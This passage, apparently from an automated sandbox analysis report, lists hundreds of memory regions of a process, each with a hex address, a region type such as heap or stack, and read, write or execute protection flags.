page read and write
|
||
34DD000
|
heap
|
page read and write
|
||
861000
|
heap
|
page read and write
|
||
6CDF000
|
trusted library allocation
|
page read and write
|
||
6706000
|
heap
|
page read and write
|
||
30D0000
|
heap
|
page read and write
|
||
310E000
|
stack
|
page read and write
|
||
6A32000
|
heap
|
page read and write
|
||
547E000
|
heap
|
page read and write
|
||
5F4E000
|
heap
|
page read and write
|
||
35C1000
|
heap
|
page read and write
|
||
8D2000
|
heap
|
page read and write
|
||
7E0000
|
heap
|
page read and write
|
||
6A10000
|
heap
|
page read and write
|
||
791E000
|
stack
|
page read and write
|
||
8DF000
|
heap
|
page read and write
|
||
C8C000
|
stack
|
page read and write
|
||
6CFF000
|
trusted library allocation
|
page read and write
|
||
792E000
|
stack
|
page read and write
|
||
7B10000
|
trusted library allocation
|
page read and write
|
||
7760000
|
heap
|
page read and write
|
||
7DF0000
|
trusted library allocation
|
page read and write
|
||
BF0000
|
heap
|
page read and write
|
||
763E000
|
stack
|
page read and write
|
||
4980000
|
heap
|
page execute and read and write
|
||
89E2000
|
trusted library allocation
|
page read and write
|
||
76DB000
|
stack
|
page read and write
|
||
549D000
|
heap
|
page read and write
|
||
EF9000
|
stack
|
page read and write
|
||
6772000
|
heap
|
page read and write
|
||
34BC000
|
heap
|
page read and write
|
||
F20000
|
heap
|
page read and write
|
||
6799000
|
heap
|
page read and write
|
||
86C0000
|
heap
|
page read and write
|
||
55C0000
|
heap
|
page read and write
|
||
6795000
|
heap
|
page read and write
|
||
6CFF000
|
trusted library allocation
|
page read and write
|
||
6F1E000
|
stack
|
page read and write
|
||
34F6000
|
heap
|
page read and write
|
||
8713000
|
heap
|
page read and write
|
||
67BC000
|
heap
|
page read and write
|
||
6CDF000
|
trusted library allocation
|
page read and write
|
||
6CBC000
|
trusted library allocation
|
page read and write
|
||
5114000
|
trusted library allocation
|
page read and write
|
||
6433000
|
trusted library allocation
|
page read and write
|
||
3580000
|
trusted library allocation
|
page execute and read and write
|
||
EBE000
|
heap
|
page read and write
|
||
34CD000
|
heap
|
page read and write
|
||
48E5000
|
trusted library allocation
|
page read and write
|
||
7A21000
|
heap
|
page read and write
|
||
89CE000
|
stack
|
page read and write
|
||
5482000
|
heap
|
page read and write
|
||
6E5D000
|
stack
|
page read and write
|
||
796E000
|
stack
|
page read and write
|
||
66FD000
|
heap
|
page read and write
|
||
F7B000
|
stack
|
page read and write
|
||
34FB000
|
heap
|
page read and write
|
||
722E000
|
stack
|
page read and write
|
||
4FA7000
|
heap
|
page read and write
|
||
8728000
|
heap
|
page read and write
|
||
70EE000
|
stack
|
page read and write
|
||
611E000
|
trusted library allocation
|
page read and write
|
||
588E000
|
stack
|
page read and write
|
||
600D000
|
heap
|
page read and write
|
||
76E1000
|
heap
|
page read and write
|
||
34F0000
|
trusted library allocation
|
page read and write
|
||
6739000
|
heap
|
page read and write
|
||
6CBC000
|
trusted library allocation
|
page read and write
|
||
678C000
|
heap
|
page read and write
|
||
611C000
|
trusted library allocation
|
page read and write
|
||
78C0000
|
trusted library allocation
|
page read and write
|
||
2F59000
|
trusted library allocation
|
page read and write
|
||
677A000
|
heap
|
page read and write
|
||
7471000
|
heap
|
page read and write
|
||
676D000
|
heap
|
page read and write
|
||
D70000
|
heap
|
page read and write
|
||
6CDF000
|
trusted library allocation
|
page read and write
|
||
775E000
|
stack
|
page read and write
|
||
67A7000
|
heap
|
page read and write
|
||
6CDF000
|
trusted library allocation
|
page read and write
|
||
4F6A000
|
heap
|
page read and write
|
||
678C000
|
heap
|
page read and write
|
||
3042000
|
trusted library allocation
|
page read and write
|
||
676D000
|
heap
|
page read and write
|
||
339E000
|
stack
|
page read and write
|
||
676C000
|
heap
|
page read and write
|
||
5497000
|
heap
|
page read and write
|
||
5432000
|
heap
|
page read and write
|
||
3014000
|
trusted library allocation
|
page read and write
|
||
4EA8000
|
trusted library allocation
|
page read and write
|
||
4EAB000
|
trusted library allocation
|
page read and write
|
||
1100000
|
trusted library allocation
|
page read and write
|
||
656E000
|
stack
|
page read and write
|
||
67A7000
|
heap
|
page read and write
|
||
66FD000
|
heap
|
page read and write
|
||
878000
|
heap
|
page read and write
|
||
3050000
|
trusted library allocation
|
page read and write
|
||
8DF000
|
heap
|
page read and write
|
||
7890000
|
trusted library allocation
|
page read and write
|
||
3059000
|
trusted library allocation
|
page read and write
|
||
890E000
|
stack
|
page read and write
|
||
88A0000
|
trusted library allocation
|
page read and write
|
||
77B0000
|
trusted library allocation
|
page read and write
|
||
5445000
|
heap
|
page read and write
|
||
6121000
|
trusted library allocation
|
page read and write
|
||
67BC000
|
heap
|
page read and write
|
||
605A000
|
heap
|
page read and write
|
||
678C000
|
heap
|
page read and write
|
||
8670000
|
direct allocation
|
page read and write
|
||
853000
|
heap
|
page read and write
|
||
7660000
|
trusted library allocation
|
page read and write
|
||
611E000
|
trusted library allocation
|
page read and write
|
||
6118000
|
trusted library allocation
|
page read and write
|
||
935000
|
heap
|
page read and write
|
||
6121000
|
trusted library allocation
|
page read and write
|
||
7B46000
|
heap
|
page read and write
|
||
60E4000
|
heap
|
page read and write
|
||
77D0000
|
trusted library allocation
|
page read and write
|
||
6CDF000
|
trusted library allocation
|
page read and write
|
||
1103000
|
trusted library allocation
|
page execute and read and write
|
||
7710000
|
trusted library allocation
|
page execute and read and write
|
||
60E5000
|
heap
|
page read and write
|
||
6702000
|
heap
|
page read and write
|
||
5F57000
|
heap
|
page read and write
|
||
67BC000
|
heap
|
page read and write
|
||
3060000
|
heap
|
page read and write
|
||
6128000
|
trusted library allocation
|
page read and write
|
||
6509000
|
heap
|
page read and write
|
||
5410000
|
heap
|
page read and write
|
||
6125000
|
trusted library allocation
|
page read and write
|
||
85A1000
|
trusted library allocation
|
page read and write
|
||
5613000
|
heap
|
page read and write
|
||
7720000
|
trusted library allocation
|
page read and write
|
||
666F000
|
heap
|
page read and write
|
||
34FC000
|
heap
|
page read and write
|
||
34DD000
|
heap
|
page read and write
|
||
611E000
|
trusted library allocation
|
page read and write
|
||
7120000
|
heap
|
page read and write
|
||
561B000
|
heap
|
page read and write
|
||
66C9000
|
heap
|
page read and write
|
||
34E2000
|
heap
|
page read and write
|
||
514F000
|
trusted library allocation
|
page read and write
|
||
34E9000
|
heap
|
page read and write
|
||
6046000
|
heap
|
page read and write
|
||
8C81000
|
trusted library allocation
|
page read and write
|
||
6CFF000
|
trusted library allocation
|
page read and write
|
||
7485000
|
heap
|
page read and write
|
||
528D000
|
stack
|
page read and write
|
||
56C1000
|
heap
|
page read and write
|
||
548F000
|
heap
|
page read and write
|
||
5DBC000
|
stack
|
page read and write
|
||
8D2000
|
heap
|
page read and write
|
||
73DE000
|
stack
|
page read and write
|
||
4E9A000
|
trusted library allocation
|
page read and write
|
||
63D0000
|
trusted library allocation
|
page read and write
|
||
6781000
|
heap
|
page read and write
|
||
F13000
|
heap
|
page read and write
|
||
561B000
|
heap
|
page read and write
|
||
1BD000
|
stack
|
page read and write
|
||
6CFF000
|
trusted library allocation
|
page read and write
|
||
7459000
|
heap
|
page read and write
|
||
3720000
|
heap
|
page execute and read and write
|
||
34D0000
|
heap
|
page read and write
|
||
34D0000
|
heap
|
page read and write
|
||
6125000
|
trusted library allocation
|
page read and write
|
||
6125000
|
trusted library allocation
|
page read and write
|
||
6113000
|
trusted library allocation
|
page read and write
|
||
879000
|
heap
|
page read and write
|
||
53E6000
|
trusted library allocation
|
page read and write
|
||
6799000
|
heap
|
page read and write
|
||
34D0000
|
heap
|
page read and write
|
||
7680000
|
trusted library allocation
|
page read and write
|
||
71DB000
|
stack
|
page read and write
|
||
6121000
|
trusted library allocation
|
page read and write
|
||
3504000
|
trusted library allocation
|
page read and write
|
||
67BC000
|
heap
|
page read and write
|
||
5F42000
|
trusted library allocation
|
page read and write
|
||
6785000
|
heap
|
page read and write
|
||
65C0000
|
trusted library allocation
|
page execute and read and write
|
||
3087000
|
trusted library allocation
|
page execute and read and write
|
||
52E2000
|
trusted library allocation
|
page read and write
|
||
564C000
|
stack
|
page read and write
|
||
35CB000
|
heap
|
page read and write
|
||
6125000
|
trusted library allocation
|
page read and write
|
||
54D0000
|
heap
|
page read and write
|
||
77E0000
|
trusted library allocation
|
page read and write
|
||
6125000
|
trusted library allocation
|
page read and write
|
||
76D1000
|
heap
|
page read and write
|
||
34C0000
|
heap
|
page read and write
|
||
7DC0000
|
trusted library allocation
|
page read and write
|
||
855E000
|
stack
|
page read and write
|
||
52D6000
|
trusted library allocation
|
page read and write
|
||
3180000
|
trusted library allocation
|
page read and write
|
||
822000
|
heap
|
page read and write
|
||
6780000
|
heap
|
page read and write
|
||
67EF000
|
heap
|
page read and write
|
||
5D99000
|
trusted library allocation
|
page read and write
|
||
3173000
|
trusted library allocation
|
page execute and read and write
|
||
51DE000
|
trusted library allocation
|
page read and write
|
||
67BC000
|
heap
|
page read and write
|
||
EF3000
|
heap
|
page read and write
|
||
36CE000
|
stack
|
page read and write
|
||
7700000
|
trusted library allocation
|
page execute and read and write
|
||
313E000
|
stack
|
page read and write
|
||
34E6000
|
heap
|
page read and write
|
||
6799000
|
heap
|
page read and write
|
||
F46000
|
heap
|
page read and write
|
||
674F000
|
heap
|
page read and write
|
||
6A10000
|
heap
|
page read and write
|
||
8B7000
|
heap
|
page read and write
|
||
5E05000
|
trusted library allocation
|
page read and write
|
||
734C000
|
stack
|
page read and write
|
||
3500000
|
trusted library allocation
|
page read and write
|
||
565B000
|
heap
|
page read and write
|
||
676D000
|
heap
|
page read and write
|
||
6CDF000
|
trusted library allocation
|
page read and write
|
||
546F000
|
heap
|
page read and write
|
||
6778000
|
heap
|
page read and write
|
||
542C000
|
heap
|
page read and write
|
||
E80000
|
heap
|
page read and write
|
||
33BE000
|
stack
|
page read and write
|
||
8D2000
|
heap
|
page read and write
|
||
6CDF000
|
trusted library allocation
|
page read and write
|
||
67BC000
|
heap
|
page read and write
|
||
11A6000
|
heap
|
page read and write
|
||
2E3F000
|
stack
|
page read and write
|
||
75CE000
|
stack
|
page read and write
|
||
6788000
|
heap
|
page read and write
|
||
70E0000
|
heap
|
page read and write
|
||
561B000
|
heap
|
page read and write
|
||
66FF000
|
heap
|
page read and write
|
||
6CFF000
|
trusted library allocation
|
page read and write
|
||
6CBC000
|
trusted library allocation
|
page read and write
|
||
34E3000
|
heap
|
page read and write
|
||
5291000
|
trusted library allocation
|
page read and write
|
||
6CDF000
|
trusted library allocation
|
page read and write
|
||
67A000
|
stack
|
page read and write
|
||
48E1000
|
trusted library allocation
|
page read and write
|
||
8DF000
|
heap
|
page read and write
|
||
6125000
|
trusted library allocation
|
page read and write
|
||
676A000
|
heap
|
page read and write
|
||
6D46000
|
trusted library allocation
|
page read and write
|
||
4846000
|
heap
|
page read and write
|
||
6724000
|
heap
|
page read and write
|
||
6CFF000
|
trusted library allocation
|
page read and write
|
||
4ECE000
|
heap
|
page read and write
|
||
3400000
|
heap
|
page read and write
|
||
607B000
|
heap
|
page read and write
|
||
30B0000
|
heap
|
page readonly
|
||
6587000
|
trusted library allocation
|
page read and write
|
||
544E000
|
heap
|
page read and write
|
||
6CBC000
|
trusted library allocation
|
page read and write
|
||
60E4000
|
heap
|
page read and write
|
||
6CFF000
|
trusted library allocation
|
page read and write
|
||
336E000
|
stack
|
page read and write
|
||
32DC000
|
stack
|
page read and write
|
||
8DB000
|
heap
|
page read and write
|
||
C10000
|
heap
|
page read and write
|
||
599E000
|
stack
|
page read and write
|
||
6340000
|
heap
|
page read and write
|
||
34BD000
|
heap
|
page read and write
|
||
4F39000
|
trusted library allocation
|
page read and write
|
||
4A57000
|
heap
|
page read and write
|
||
3535000
|
trusted library allocation
|
page execute and read and write
|
||
6DDE000
|
stack
|
page read and write
|
||
48CF000
|
stack
|
page read and write
|
||
66FD000
|
heap
|
page read and write
|
||
672D000
|
heap
|
page read and write
|
||
3085000
|
trusted library allocation
|
page execute and read and write
|
||
600D000
|
heap
|
page read and write
|
||
1132000
|
trusted library allocation
|
page read and write
|
||
611C000
|
trusted library allocation
|
page read and write
|
||
750E000
|
stack
|
page read and write
|
||
676D000
|
heap
|
page read and write
|
||
55D3000
|
heap
|
page read and write
|
||
903000
|
heap
|
page read and write
|
||
73D0000
|
trusted library allocation
|
page read and write
|
||
7B7E000
|
heap
|
page read and write
|
||
7718000
|
heap
|
page read and write
|
||
7B79000
|
heap
|
page read and write
|
||
799E000
|
stack
|
page read and write
|
||
6E5E000
|
stack
|
page read and write
|
||
678D000
|
heap
|
page read and write
|
||
673F000
|
heap
|
page read and write
|
||
5F46000
|
heap
|
page read and write
|
||
6113000
|
trusted library allocation
|
page read and write
|
||
8F5E000
|
stack
|
page read and write
|
||
85BD000
|
stack
|
page read and write
|
||
7A50000
|
trusted library allocation
|
page read and write
|
||
864000
|
heap
|
page read and write
|
||
371E000
|
stack
|
page read and write
|
||
34E3000
|
heap
|
page read and write
|
||
2E40000
|
trusted library allocation
|
page read and write
|
||
33A5000
|
heap
|
page read and write
|
||
546F000
|
heap
|
page read and write
|
||
7BD3000
|
heap
|
page read and write
|
||
7110000
|
heap
|
page read and write
|
||
6CDF000
|
trusted library allocation
|
page read and write
|
||
55C3000
|
heap
|
page read and write
|
||
672C000
|
heap
|
page read and write
|
||
607B000
|
heap
|
page read and write
|
||
52F1000
|
trusted library allocation
|
page read and write
|
||
3170000
|
trusted library allocation
|
page read and write
|
||
843000
|
heap
|
page read and write
|
||
6121000
|
trusted library allocation
|
page read and write
|
||
D021000
|
trusted library allocation
|
page read and write
|
||
6061000
|
heap
|
page read and write
|
||
3452000
|
heap
|
page read and write
|
||
903000
|
heap
|
page read and write
|
||
8BE000
|
stack
|
page read and write
|
||
91C000
|
stack
|
page read and write
|
||
34F8000
|
heap
|
page read and write
|
||
6FD5000
|
trusted library allocation
|
page read and write
|
||
6CBC000
|
trusted library allocation
|
page read and write
|
||
30FE000
|
stack
|
page read and write
|
||
5370000
|
heap
|
page read and write
|
||
7B00000
|
trusted library allocation
|
page read and write
|
||
34DE000
|
heap
|
page read and write
|
||
6783000
|
heap
|
page read and write
|
||
3603000
|
heap
|
page read and write
|
||
701E000
|
stack
|
page read and write
|
||
6570000
|
trusted library allocation
|
page read and write
|
||
6E1E000
|
stack
|
page read and write
|
||
6CBC000
|
trusted library allocation
|
page read and write
|
||
7446000
|
heap
|
page read and write
|
||
7AA0000
|
trusted library allocation
|
page read and write
|
||
3532000
|
trusted library allocation
|
page read and write
|
||
7730000
|
trusted library allocation
|
page read and write
|
||
8D2000
|
heap
|
page read and write
|
||
1150000
|
trusted library allocation
|
page read and write
|
||
6A06000
|
heap
|
page read and write
|
||
55F9000
|
heap
|
page read and write
|
||
8510000
|
heap
|
page read and write
|
||
34E3000
|
heap
|
page read and write
|
||
66AA000
|
heap
|
page read and write
|
||
1126000
|
trusted library allocation
|
page execute and read and write
|
||
3140000
|
heap
|
page readonly
|
||
78B0000
|
trusted library allocation
|
page read and write
|
||
8DF000
|
heap
|
page read and write
|
||
867000
|
heap
|
page read and write
|
||
73DB000
|
stack
|
page read and write
|
||
7740000
|
trusted library allocation
|
page read and write
|
||
61CB000
|
trusted library allocation
|
page read and write
|
||
34DF000
|
heap
|
page read and write
|
||
7A2D000
|
stack
|
page read and write
|
||
72C2000
|
heap
|
page read and write
|
||
600D000
|
heap
|
page read and write
|
||
D621000
|
trusted library allocation
|
page read and write
|
||
2F64000
|
trusted library allocation
|
page read and write
|
||
7DE0000
|
trusted library allocation
|
page read and write
|
||
8500000
|
trusted library allocation
|
page execute and read and write
|
||
776000
|
stack
|
page read and write
|
||
600D000
|
heap
|
page read and write
|
||
6772000
|
heap
|
page read and write
|
||
B021000
|
trusted library allocation
|
page read and write
|
||
7E60000
|
trusted library allocation
|
page read and write
|
||
A4E000
|
stack
|
page read and write
|
||
6780000
|
heap
|
page read and write
|
||
7200000
|
direct allocation
|
page read and write
|
||
62F4000
|
trusted library allocation
|
page read and write
|
||
66F7000
|
heap
|
page read and write
|
||
6115000
|
trusted library allocation
|
page read and write
|
||
6677000
|
heap
|
page read and write
|
||
735E000
|
stack
|
page read and write
|
||
5F11000
|
heap
|
page read and write
|
||
31A0000
|
trusted library allocation
|
page read and write
|
||
6A20000
|
heap
|
page read and write
|
||
6CDF000
|
trusted library allocation
|
page read and write
|
||
4EDB000
|
trusted library allocation
|
page read and write
|
||
4DA1000
|
trusted library allocation
|
page read and write
|
||
6CFF000
|
trusted library allocation
|
page read and write
|
||
312E000
|
stack
|
page read and write
|
||
55A4000
|
trusted library allocation
|
page read and write
|
||
74E000
|
stack
|
page read and write
|
||
6FB0000
|
trusted library allocation
|
page read and write
|
||
6044000
|
heap
|
page read and write
|
||
831E000
|
stack
|
page read and write
|
||
E7B000
|
stack
|
page read and write
|
||
4D70000
|
heap
|
page execute and read and write
|
||
66FF000
|
heap
|
page read and write
|
||
5A1C000
|
trusted library allocation
|
page read and write
|
||
61C7000
|
trusted library allocation
|
page read and write
|
||
7AF0000
|
trusted library allocation
|
page read and write
|
||
3029000
|
trusted library allocation
|
page read and write
|
||
843000
|
heap
|
page read and write
|
||
672D000
|
heap
|
page read and write
|
||
86F000
|
heap
|
page read and write
|
||
7670000
|
heap
|
page read and write
|
||
67AB000
|
heap
|
page read and write
|
||
6127000
|
trusted library allocation
|
page read and write
|
||
7480000
|
heap
|
page execute and read and write
|
||
542F000
|
heap
|
page read and write
|
||
55FC000
|
heap
|
page read and write
|
||
36BD000
|
stack
|
page read and write
|
||
6780000
|
heap
|
page read and write
|
||
C1A000
|
heap
|
page read and write
|
||
8DF000
|
heap
|
page read and write
|
||
5443000
|
heap
|
page read and write
|
||
34F0000
|
heap
|
page read and write
|
||
7690000
|
trusted library allocation
|
page read and write
|
||
4EE7000
|
trusted library allocation
|
page read and write
|
||
676D000
|
heap
|
page read and write
|
||
4FA5000
|
heap
|
page read and write
|
||
600C000
|
heap
|
page read and write
|
||
3010000
|
trusted library allocation
|
page read and write
|
||
5440000
|
heap
|
page read and write
|
||
5078000
|
trusted library allocation
|
page read and write
|
||
5B80000
|
heap
|
page read and write
|
||
34C3000
|
heap
|
page read and write
|
||
611E000
|
trusted library allocation
|
page read and write
|
||
561B000
|
heap
|
page read and write
|
||
56D3000
|
heap
|
page read and write
|
||
6D00000
|
trusted library allocation
|
page read and write
|
||
87E000
|
heap
|
page read and write
|
||
77F0000
|
heap
|
page read and write
|
||
56F0000
|
heap
|
page read and write
|
||
6121000
|
trusted library allocation
|
page read and write
|
||
8510000
|
trusted library allocation
|
page read and write
|
||
56DE000
|
heap
|
page read and write
|
||
5F4E000
|
heap
|
page read and write
|
||
678A000
|
heap
|
page read and write
|
||
869E000
|
direct allocation
|
page read and write
|
||
6042000
|
heap
|
page read and write
|
||
E021000
|
trusted library allocation
|
page read and write
|
||
7491000
|
heap
|
page read and write
|
||
CF0000
|
heap
|
page read and write
|
||
56E9000
|
trusted library allocation
|
page read and write
|
||
646E000
|
stack
|
page read and write
|
||
113B000
|
trusted library allocation
|
page execute and read and write
|
||
6CBC000
|
trusted library allocation
|
page read and write
|
||
7240000
|
heap
|
page read and write
|
||
7400000
|
heap
|
page read and write
|
||
8DB000
|
heap
|
page read and write
|
||
7E50000
|
trusted library allocation
|
page read and write
|
||
6A32000
|
heap
|
page read and write
|
||
51D2000
|
trusted library allocation
|
page read and write
|
||
1130000
|
trusted library allocation
|
page read and write
|
||
52D0000
|
trusted library allocation
|
page read and write
|
||
600D000
|
heap
|
page read and write
|
||
8330000
|
trusted library allocation
|
page read and write
|
||
3044000
|
trusted library allocation
|
page read and write
|
||
729D000
|
stack
|
page read and write
|
||
C30000
|
heap
|
page read and write
|
||
705E000
|
stack
|
page read and write
|
||
565B000
|
heap
|
page read and write
|
||
8731000
|
heap
|
page read and write
|
||
513C000
|
stack
|
page read and write
|
||
34B0000
|
heap
|
page read and write
|
||
34DD000
|
heap
|
page read and write
|
||
71EE000
|
stack
|
page read and write
|
||
55DC000
|
heap
|
page read and write
|
||
67BD000
|
heap
|
page read and write
|
||
716E000
|
stack
|
page read and write
|
||
6046000
|
heap
|
page read and write
|
||
10F0000
|
heap
|
page read and write
|
||
67A7000
|
heap
|
page read and write
|
||
611E000
|
trusted library allocation
|
page read and write
|
||
5605000
|
heap
|
page read and write
|
||
760E000
|
stack
|
page read and write
|
||
34E5000
|
heap
|
page read and write
|
||
1137000
|
trusted library allocation
|
page execute and read and write
|
||
61DB000
|
trusted library allocation
|
page read and write
|
||
678C000
|
heap
|
page read and write
|
||
758E000
|
stack
|
page read and write
|
||
7FAA0000
|
trusted library allocation
|
page execute and read and write
|
||
85F000
|
heap
|
page read and write
|
||
2F95000
|
trusted library allocation
|
page read and write
|
||
6772000
|
heap
|
page read and write
|
||
66F4000
|
heap
|
page read and write
|
||
1110000
|
trusted library allocation
|
page read and write
|
||
67BC000
|
heap
|
page read and write
|
||
8DF000
|
heap
|
page read and write
|
||
611E000
|
trusted library allocation
|
page read and write
|
||
55D1000
|
heap
|
page read and write
|
||
6CDF000
|
trusted library allocation
|
page read and write
|
||
958000
|
stack
|
page read and write
|
||
2F3E000
|
trusted library allocation
|
page read and write
|
||
304D000
|
trusted library allocation
|
page execute and read and write
|
||
7EA0000
|
trusted library allocation
|
page read and write
|
||
712B000
|
stack
|
page read and write
|
||
89D0000
|
trusted library allocation
|
page read and write
|
||
8D2000
|
heap
|
page read and write
|
||
3519000
|
trusted library allocation
|
page read and write
|
||
4F9B000
|
heap
|
page read and write
|
||
65B0000
|
trusted library allocation
|
page read and write
|
||
3180000
|
trusted library allocation
|
page read and write
|
||
324E000
|
heap
|
page read and write
|
||
4DEC000
|
trusted library allocation
|
page read and write
|
||
8AB2000
|
heap
|
page read and write
|
||
8DB000
|
heap
|
page read and write
|
||
378C000
|
stack
|
page read and write
|
||
3E81000
|
trusted library allocation
|
page read and write
|
||
6CBC000
|
trusted library allocation
|
page read and write
|
||
5F44000
|
heap
|
page read and write
|
||
C021000
|
trusted library allocation
|
page read and write
|
||
67A7000
|
heap
|
page read and write
|
||
7610000
|
trusted library allocation
|
page read and write
|
||
584E000
|
stack
|
page read and write
|
||
126C000
|
heap
|
page read and write
|
||
5138000
|
trusted library allocation
|
page read and write
|
||
3170000
|
trusted library allocation
|
page execute and read and write
|
||
8F9000
|
heap
|
page read and write
|
||
751D000
|
stack
|
page read and write
|
||
30E0000
|
heap
|
page read and write
|
||
66F4000
|
heap
|
page read and write
|
||
8DB000
|
heap
|
page read and write
|
||
82E000
|
heap
|
page read and write
|
||
3120000
|
heap
|
page read and write
|
||
754F000
|
stack
|
page read and write
|
||
5495000
|
heap
|
page read and write
|
||
771E000
|
stack
|
page read and write
|
||
8DF000
|
heap
|
page read and write
|
||
66FF000
|
heap
|
page read and write
|
||
8DB000
|
heap
|
page read and write
|
||
864000
|
heap
|
page read and write
|
||
350D000
|
trusted library allocation
|
page execute and read and write
|
||
6A02000
|
heap
|
page read and write
|
||
7692000
|
heap
|
page read and write
|
||
DBE000
|
stack
|
page read and write
|
||
6405000
|
heap
|
page read and write
|
||
6FDF000
|
stack
|
page read and write
|
||
34C1000
|
heap
|
page read and write
|
||
7E30000
|
trusted library allocation
|
page read and write
|
||
5E09000
|
trusted library allocation
|
page read and write
|
||
6023000
|
heap
|
page read and write
|
||
3547000
|
heap
|
page read and write
|
||
8DB000
|
heap
|
page read and write
|
||
3160000
|
trusted library allocation
|
page read and write
|
||
6FD0000
|
trusted library allocation
|
page read and write
|
||
67BC000
|
heap
|
page read and write
|
||
B8D000
|
stack
|
page read and write
|
||
8D2000
|
heap
|
page read and write
|
||
755B000
|
stack
|
page read and write
|
||
3653000
|
heap
|
page read and write
|
||
731E000
|
stack
|
page read and write
|
||
6777000
|
heap
|
page read and write
|
||
779D000
|
stack
|
page read and write
|
||
8D2000
|
heap
|
page read and write
|
||
7D7E000
|
stack
|
page read and write
|
||
65E0000
|
heap
|
page read and write
|
||
611A000
|
trusted library allocation
|
page read and write
|
||
6742000
|
heap
|
page read and write
|
||
66F0000
|
heap
|
page read and write
|
||
549D000
|
heap
|
page read and write
|
||
6A12000
|
heap
|
page read and write
|
||
9BF000
|
stack
|
page read and write
|
||
6C00000
|
trusted library allocation
|
page read and write
|
||
574F000
|
stack
|
page read and write
|
||
3540000
|
heap
|
page read and write
|
||
6CBC000
|
trusted library allocation
|
page read and write
|
||
6121000
|
trusted library allocation
|
page read and write
|
||
B621000
|
trusted library allocation
|
page read and write
|
||
6ED0000
|
heap
|
page execute and read and write
|
||
48DC000
|
trusted library allocation
|
page read and write
|
||
666D000
|
heap
|
page read and write
|
||
BB0000
|
trusted library allocation
|
page read and write
|
||
8E70000
|
trusted library allocation
|
page read and write
|
||
6A01000
|
heap
|
page read and write
|
||
7A90000
|
trusted library allocation
|
page read and write
|
||
6751000
|
heap
|
page read and write
|
||
71F2000
|
direct allocation
|
page read and write
|
||
3060000
|
trusted library allocation
|
page read and write
|
||
6CFF000
|
trusted library allocation
|
page read and write
|
||
34DD000
|
heap
|
page read and write
|
||
611C000
|
trusted library allocation
|
page read and write
|
||
4D87000
|
heap
|
page read and write
|
||
3238000
|
stack
|
page read and write
|
||
55E1000
|
heap
|
page read and write
|
||
77D0000
|
heap
|
page read and write
|
||
6795000
|
heap
|
page read and write
|
||
7E40000
|
trusted library allocation
|
page read and write
|
||
1120000
|
trusted library allocation
|
page read and write
|
||
6121000
|
trusted library allocation
|
page read and write
|
||
D50000
|
heap
|
page read and write
|
||
6CBC000
|
trusted library allocation
|
page read and write
|
||
66FD000
|
heap
|
page read and write
|
||
673F000
|
heap
|
page read and write
|
There are 1397 hidden memdumps, click here to show them.